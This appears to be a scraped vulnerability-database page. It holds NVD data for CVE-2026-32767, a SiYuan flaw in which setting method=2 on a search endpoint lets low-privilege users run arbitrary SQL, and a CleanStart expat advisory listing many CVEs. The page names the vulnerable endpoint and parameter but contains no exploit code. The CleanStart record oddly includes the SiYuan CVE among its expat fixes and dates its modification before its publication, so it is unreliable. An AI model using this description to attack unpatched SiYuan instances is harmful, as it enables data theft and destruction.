              "matchCriteriaId": "E1AA6470-222A-4841-A487-DF65F9859780",
              "versionEndExcluding": "3.6.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user \u2014 including those with the Reader role \u2014 to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application\u0027s database. This is inconsistent with the application\u0027s own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1."
    },
    {
      "lang": "es",
      "value": "SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Las versiones 3.6.0 e inferiores contienen una vulnerabilidad de omisi\u00f3n de autorizaci\u00f3n en el endpoint /api/search/fullTextSearchBlock. Cuando el par\u00e1metro method se establece en 2, el endpoint pasa la entrada proporcionada por el usuario directamente como una sentencia SQL sin procesar a la base de datos SQLite subyacente sin ninguna autorizaci\u00f3n ni comprobaci\u00f3n de solo lectura. Esto permite a cualquier usuario autenticado \u2014 incluidos aquellos con el rol de Lector \u2014 ejecutar sentencias SQL arbitrarias (SELECT, DELETE, UPDATE, DROP TABLE, etc.) contra la base de datos de la aplicaci\u00f3n. Esto es inconsistente con el propio modelo de seguridad de la aplicaci\u00f3n: el endpoint SQL dedicado (/api/query/sql) requiere correctamente el middleware CheckAdminRole y CheckReadonly, pero el endpoint de b\u00fasqueda omite estos controles por completo. Este problema ha sido solucionado en la versi\u00f3n 3.6.1."
    }
  ],
  "id": "CVE-2026-32767",
  "lastModified": "2026-03-23T15:23:44.380",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T01:15:55.597",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/siyuan-note/siyuan/issues/17209"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        },
        {
          "lang": "en",
          "value": "CWE-863"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

cleanstart-2026-em10970

Vulnerability from cleanstart

Published

2026-04-01 09:16

Modified

2026-03-26 13:10

Summary

Security fixes for CVE-2017-9233, CVE-2019-15903, CVE-2021-45960, CVE-2021-46143, CVE-2022-22822, CVE-2022-22823, CVE-2022-22824, CVE-2022-22825, CVE-2022-22826, CVE-2022-22827, CVE-2022-23852, CVE-2022-23990, CVE-2022-25235, CVE-2022-25236, CVE-2022-25313, CVE-2022-25314, CVE-2022-25315, CVE-2022-40674, CVE-2022-43680, CVE-2023-52425, CVE-2023-52426, CVE-2024-28757, CVE-2024-45490, CVE-2024-45491, CVE-2024-45492, CVE-2024-50602, CVE-2026-24515, CVE-2026-25210, CVE-2026-32767 applied in versions: 2.2.0-r1, 2.2.7-r0, 2.2.7-r1, 2.4.3-r0, 2.4.4-r0, 2.4.5-r0, 2.4.9-r0, 2.5.0-r0, 2.6.0-r0, 2.6.2-r0, 2.6.3-r0, 2.6.4-r0, 2.7.2-r0, 2.7.5-r0

Details

Multiple security vulnerabilities affect the expat package. These issues are resolved in later releases. See references for individual vulnerability details.

References

URL

Type

	https://github.com/cleanstart-dev/cleanstart-secu…	ADVISORY
	https://osv.dev/vulnerability/CVE-2017-9233	WEB
	https://osv.dev/vulnerability/CVE-2019-15903	WEB
	https://osv.dev/vulnerability/CVE-2021-45960	WEB
	https://osv.dev/vulnerability/CVE-2021-46143	WEB
	https://osv.dev/vulnerability/CVE-2022-22822	WEB
	https://osv.dev/vulnerability/CVE-2022-22823	WEB
	https://osv.dev/vulnerability/CVE-2022-22824	WEB
	https://osv.dev/vulnerability/CVE-2022-22825	WEB
	https://osv.dev/vulnerability/CVE-2022-22826	WEB
	https://osv.dev/vulnerability/CVE-2022-22827	WEB
	https://osv.dev/vulnerability/CVE-2022-23852	WEB
	https://osv.dev/vulnerability/CVE-2022-23990	WEB
	https://osv.dev/vulnerability/CVE-2022-25235	WEB
	https://osv.dev/vulnerability/CVE-2022-25236	WEB
	https://osv.dev/vulnerability/CVE-2022-25313	WEB
	https://osv.dev/vulnerability/CVE-2022-25314	WEB
	https://osv.dev/vulnerability/CVE-2022-25315	WEB
	https://osv.dev/vulnerability/CVE-2022-40674	WEB
	https://osv.dev/vulnerability/CVE-2022-43680	WEB
	https://osv.dev/vulnerability/CVE-2023-52425	WEB
	https://osv.dev/vulnerability/CVE-2023-52426	WEB
	https://osv.dev/vulnerability/CVE-2024-28757	WEB
	https://osv.dev/vulnerability/CVE-2024-45490	WEB
	https://osv.dev/vulnerability/CVE-2024-45491	WEB
	https://osv.dev/vulnerability/CVE-2024-45492	WEB
	https://osv.dev/vulnerability/CVE-2024-50602	WEB
	https://osv.dev/vulnerability/CVE-2026-24515	WEB
	https://osv.dev/vulnerability/CVE-2026-25210	WEB
	https://osv.dev/vulnerability/CVE-2026-32767	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2017-9233	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2019-15903	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2021-45960	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2021-46143	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-22822	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-22823	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-22824	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-22825	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-22826	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-22827	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-23852	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-23990	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-25235	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-25236	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-25313	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-25314	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-25315	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-40674	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2022-43680	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2023-52425	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2023-52426	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-28757	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-45490	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-45491	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-45492	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2024-50602	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-24515	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-25210	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-32767	WEB

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "expat"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.7.5-r0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the expat package. These issues are resolved in later releases. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-EM10970",
  "modified": "2026-03-26T13:10:59Z",
  "published": "2026-04-01T09:16:01.861201Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-EM10970.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2017-9233"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2019-15903"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2021-45960"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2021-46143"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-22822"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-22823"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-22824"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-22825"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-22826"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-22827"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-23852"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-23990"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-25235"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-25236"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-25313"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-25314"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-25315"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-40674"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2022-43680"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2023-52425"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2023-52426"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-28757"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-45490"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-45491"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-45492"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2024-50602"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-24515"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-25210"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-32767"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9233"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15903"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45960"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46143"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22822"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22823"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22824"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22825"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22826"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22827"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23852"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23990"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25235"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25236"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25313"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25314"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25315"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40674"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43680"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52425"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52426"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28757"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45490"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45491"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45492"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50602"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25210"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32767"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "summary": "Security fixes for CVE-2017-9233, CVE-2019-15903, CVE-2021-45960, CVE-2021-46143, CVE-2022-22822, CVE-2022-22823, CVE-2022-22824, CVE-2022-22825, CVE-2022-22826, CVE-2022-22827, CVE-2022-23852, CVE-2022-23990, CVE-2022-25235, CVE-2022-25236, CVE-2022-25313, CVE-2022-25314, CVE-2022-25315, CVE-2022-40674, CVE-2022-43680, CVE-2023-52425, CVE-2023-52426, CVE-2024-28757, CVE-2024-45490, CVE-2024-45491, CVE-2024-45492, CVE-2024-50602, CVE-2026-24515, CVE-2026-25210, CVE-2026-32767 applied in versions: 2.2.0-r1, 2.2.7-r0, 2.2.7-r1, 2.4.3-r0, 2.4.4-r0, 2.4.5-r0, 2.4.9-r0, 2.5.0-r0, 2.6.0-r0, 2.6.2-r0, 2.6.3-r0, 2.6.4-r0, 2.7.2-r0, 2.7.5-r0",
  "upstream": [
    "CVE-2017-9233",
    "CVE-2019-15903",
    "CVE-2021-45960",
    "CVE-2021-46143",
    "CVE-2022-22822",
    "CVE-2022-22823",
    "CVE-2022-22824",
    "CVE-2022-22825",
    "CVE-2022-22826",
    "CVE-2022-22827",
    "CVE-2022-23852",
    "CVE-2022-23990",
    "CVE-2022-25235",
    "CVE-2022-25236",
    "CVE-2022-25313",
    "CVE-2022-25314",
    "CVE-2022-25315",
    "CVE-2022-40674",
    "CVE-2022-43680",
    "CVE-2023-52425",
    "CVE-2023-52426",
    "CVE-2024-28757",
    "CVE-2024-45490",
    "CVE-2024-45491",
    "CVE-2024-45492",
    "CVE-2024-50602",
    "CVE-2026-24515",
    "CVE-2026-25210",
    "CVE-2026-32767"
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32767 (GCVE-0-2026-32767)

GHSA-J7WH-X834-P3R7

Summary

Root Cause Analysis

The Vulnerable Endpoint

The Properly Protected Endpoint (for comparison)

The Vulnerable Code Path

Authorization Model

Proof of Concept

Prerequisites

Steps to Reproduce

Expected Behavior

Actual Behavior

Impact

Suggested Fix

FKIE_CVE-2026-32767

cleanstart-2026-em10970

Vulnerability from cleanstart

Tags

Sightings

Nomenclature